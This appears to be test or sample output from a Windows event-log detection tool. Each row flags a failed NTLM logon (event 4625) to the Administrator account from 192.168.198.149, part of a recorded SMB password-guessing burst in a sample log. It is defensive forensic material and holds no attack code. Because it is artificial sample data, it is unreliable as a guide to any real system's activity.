+2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jsTFTCnFFBkhG5jP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5qiwcKE2TQui2H8z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PZOCyXplWOCyKbFm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RhyaAhYB78nbh1Ig  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MIJU9xbr1klIvvdE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qLKVR3mW3g3utO4X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aNm4tVG8bV7e9gbB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JtU0PCr9K5DXFYV2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CH3BWNPEWlw52Gb6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vQTYqFKBz6YEWhF6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qkj3u8ODgLD7xQ5R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r9uyze1uO0zuNNUM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UmL15i3edXHcUamI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x7xjFRjv9rDhiXJ6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6BmQhVEv8g7EKu1F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: upOMmG87cDO1NFg0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tO55KfkORhxFORvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D64wDbqkqmzWuUSa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sIDgNIlGA0cOkBOI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i0kXPQ6s7CGe4QGA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HW5jP389jmqSkzF1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: enhsof25BdDPcI2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4acsPMLUJRrT7mmL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hi1dzny6hpyr5N3d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RlPVBSnDMlE0QZaJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: th72TwMoRXtDVWge  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KGTTiJSkErjzoUUC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xyzZwNLltF0cYnai  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gYWVQ6mCqyBfDm3m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rg2x2lv9JeS5Bb6l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fU28NKC3WYxFGbMN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EUWDXgnogGDXizWj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXhAtnNcQKOIsuGS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cKfrJwI3OGdjL4af  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VdekC160hU7YzrK9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: enOBuzd6jwu8rZCH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eAjLjDlZSps5D49t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rY6CONLBVygSTnY5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6FIHgz2yqqbD9zfV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d82RRXgSmZdnfa8I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xA3ZWnWc9CoGeKpm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FvSYKi8KvEtnmSbs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IvxXI1u0AwtNHNSU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OFIy6Cps3Rm87Kqf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: slL3aPBnZl3lVJst  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O98P1oP3AU4lZp2D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EZZ7wIJNZ0CG7fMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7RhwHCqXQytvcaom  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xumaxbBEMZqL6pPO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ur1yZIwgB3ecNJGw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xAuGcKYRcLe0z3bl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmMi0edfBJ8KoJst  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlnoKbUb9jiqJD7t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hBeWGNkWTSp3nje8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2iwM6jPgNjZ3q5qb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xdkrA9Kwzero8eSk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Tb2ZvuJMxOfsxIT6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PBMBRPdATYpLNmyI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P1CKprAPSw4hgiBB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y8qtzwuGJfQG4XB7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: auOf2GwkoymLh4bC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2YcMYQ4sA2GfMwCS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YL1iM6WUtZIjIoTI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t7ruxdEGdeP3RLqF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZFXBpUJzafGYIggt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MC1K9nNLupH0NuSS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6rVfBLm10US9II19  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SBhAVHHtR7lZ1C3z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FKuUH8lMELYHibxF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UytgJLBtGRMCf3ar  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yno9399gUI2oBr4H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbsqE98qy27Sp0UJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
